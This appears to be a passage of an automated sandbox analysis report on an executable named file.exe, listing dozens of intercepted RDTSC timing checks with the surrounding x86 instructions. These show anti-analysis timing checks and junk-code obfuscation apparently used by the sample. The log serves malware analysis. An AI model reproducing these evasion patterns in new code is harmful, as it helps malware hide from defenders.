Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73C196 second address: 73C1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 push edx 0x0000000a jmp 00007F60A4E98F05h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 je 00007F60A4E98EFEh 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73DBAF second address: 73DBB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74520B second address: 745211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745211 second address: 745217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 745217 second address: 745221 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60A4E98EF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7445D6 second address: 7445DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7445DA second address: 7445F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F04h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 744DC6 second address: 744DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DB23 second address: 74DB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DB27 second address: 74DB5C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F60A4BE8BD6h 0x00000008 jmp 00007F60A4BE8BE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F60A4BE8BDDh 0x00000016 jnp 00007F60A4BE8BD6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DB5C second address: 74DB7A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F60A4E98F03h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DB7A second address: 74DB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DB85 second address: 74DB89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DCFB second address: 74DCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DCFF second address: 74DD17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60A4E98EFAh 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F60A4E98EF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DFBD second address: 74DFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74DFC1 second address: 74DFD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F60A4E98EF6h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E1A2 second address: 74E1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE2h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F60A4BE8BD6h 0x00000013 jmp 00007F60A4BE8BE4h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E1D7 second address: 74E1E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F60A4E98EF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74E484 second address: 74E4A4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60A4BE8BDAh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60A4BE8BE2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FD5AC second address: 6FD5B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60A4E98EF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74ECEE second address: 74ECF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74ECF2 second address: 74ECFC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60A4E98EF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74ECFC second address: 74ED16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F60A4BE8BE8h 0x0000000c push ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop ebx 0x00000012 jo 00007F60A4BE8BDCh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7536BC second address: 7536D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7536D1 second address: 7536FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F60A4BE8BE3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71437D second address: 6FC986 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F60A4E98EF8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F60A4E98EFFh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F60A4E98EF8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d lea eax, dword ptr [ebp+12479095h] 0x00000033 xor ecx, dword ptr [ebp+122D2E96h] 0x00000039 nop 0x0000003a jmp 00007F60A4E98EFCh 0x0000003f push eax 0x00000040 push eax 0x00000041 pushad 0x00000042 jmp 00007F60A4E98EFEh 0x00000047 jno 00007F60A4E98EF6h 0x0000004d popad 0x0000004e pop eax 0x0000004f nop 0x00000050 push 00000000h 0x00000052 push ecx 0x00000053 call 00007F60A4E98EF8h 0x00000058 pop ecx 0x00000059 mov dword ptr [esp+04h], ecx 0x0000005d add dword ptr [esp+04h], 00000017h 0x00000065 inc ecx 0x00000066 push ecx 0x00000067 ret 0x00000068 pop ecx 0x00000069 ret 0x0000006a call dword ptr [ebp+122D2B1Dh] 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F60A4E98F00h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7149F5 second address: 7149F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 714B0C second address: 714B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F60A4E98EF6h 0x0000000a popad 0x0000000b jc 00007F60A4E98EFCh 0x00000011 jnp 00007F60A4E98EF6h 0x00000017 popad 0x00000018 xor dword ptr [esp], 5E3A5D33h 0x0000001f mov dword ptr [ebp+122D3022h], edx 0x00000025 jbe 00007F60A4E98F19h 0x0000002b call 00007F60A4E98F04h 0x00000030 call 00007F60A4E98EFDh 0x00000035 pop ecx 0x00000036 pop edx 0x00000037 push 86A60484h 0x0000003c push eax 0x0000003d push edx 0x0000003e jc 00007F60A4E98EF8h 0x00000044 push esi 0x00000045 pop esi 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 714CB1 second address: 714CBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7153C3 second address: 7153C8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7153C8 second address: 715429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F60A4BE8BD8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 0000001Eh 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007F60A4BE8BD8h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 jne 00007F60A4BE8BD8h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715727 second address: 71572D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71572D second address: 715731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715731 second address: 715735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7157F4 second address: 715802 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715802 second address: 71581F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 71581F second address: 715878 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edx, dword ptr [ebp+122D2D7Ah] 0x0000000f lea eax, dword ptr [ebp+124790D9h] 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F60A4BE8BD8h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f mov ecx, dword ptr [ebp+122D2D0Eh] 0x00000035 movsx edi, ax 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jnc 00007F60A4BE8BD6h 0x00000042 jmp 00007F60A4BE8BE3h 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 715878 second address: 7158CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F60A4E98EF6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F60A4E98F09h 0x00000016 lea eax, dword ptr [ebp+12479095h] 0x0000001c pushad 0x0000001d mov ecx, 260CD041h 0x00000022 xor dword ptr [ebp+122D2FA0h], edi 0x00000028 popad 0x00000029 nop 0x0000002a jns 00007F60A4E98EFAh 0x00000030 push eax 0x00000031 je 00007F60A4E98F12h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7158CB second address: 7158CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7158CF second address: 6FD5AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F60A4E98EF8h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 jns 00007F60A4E98EFCh 0x0000002a call dword ptr [ebp+122D23B5h] 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753B74 second address: 753B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 753FFC second address: 75401D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F60A4E98EF6h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F60A4E98F01h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541B5 second address: 7541CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4BE8BE0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541CB second address: 7541CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7541CF second address: 7541EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 758F8B second address: 758F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 758F91 second address: 758F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F60A4BE8BD6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759547 second address: 75958A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98EFBh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F60A4E98F00h 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F60A4E98EF6h 0x0000001a jmp 00007F60A4E98F08h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75958A second address: 75958E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75958E second address: 759594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759594 second address: 75959A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75959A second address: 7595A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F60A4E98EF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7595A4 second address: 7595B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F60A4BE8BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759B63 second address: 759B67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 759B67 second address: 759B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760077 second address: 760081 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60A4E98EF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75F961 second address: 75F971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F60A4BE8BD6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75F971 second address: 75F976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75F976 second address: 75F982 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F60A4BE8BDEh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 767025 second address: 76702C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76702C second address: 767049 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F60A4BE8BDEh 0x00000008 ja 00007F60A4BE8BD6h 0x0000000e push eax 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jnc 00007F60A4BE8BD6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 766488 second address: 76648C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76648C second address: 766498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 766498 second address: 7664AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F01h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7664AF second address: 7664B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7664B4 second address: 7664B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7665FC second address: 766610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 766775 second address: 766779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7668B9 second address: 7668C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F60A4BE8BD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76C3A6 second address: 76C3C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F01h 0x00000009 pop edx 0x0000000a jnp 00007F60A4E98EFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76C111 second address: 76C11D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F60A4BE8BD6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76C11D second address: 76C121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6D3111 second address: 6D3115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770937 second address: 77093D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770A61 second address: 770A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60A4BE8BD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770A70 second address: 770A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770BDC second address: 770BEC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60A4BE8BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770BEC second address: 770BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 770BF0 second address: 770BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7151AA second address: 7151B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F60A4E98EF6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7151B8 second address: 7151CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BDAh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7710EF second address: 7710F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77A3AE second address: 77A3DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F60A4BE8BE6h 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F60A4BE8BDDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778328 second address: 778331 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778331 second address: 778337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778337 second address: 77833D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77833D second address: 77835F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778482 second address: 778488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778488 second address: 77848C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
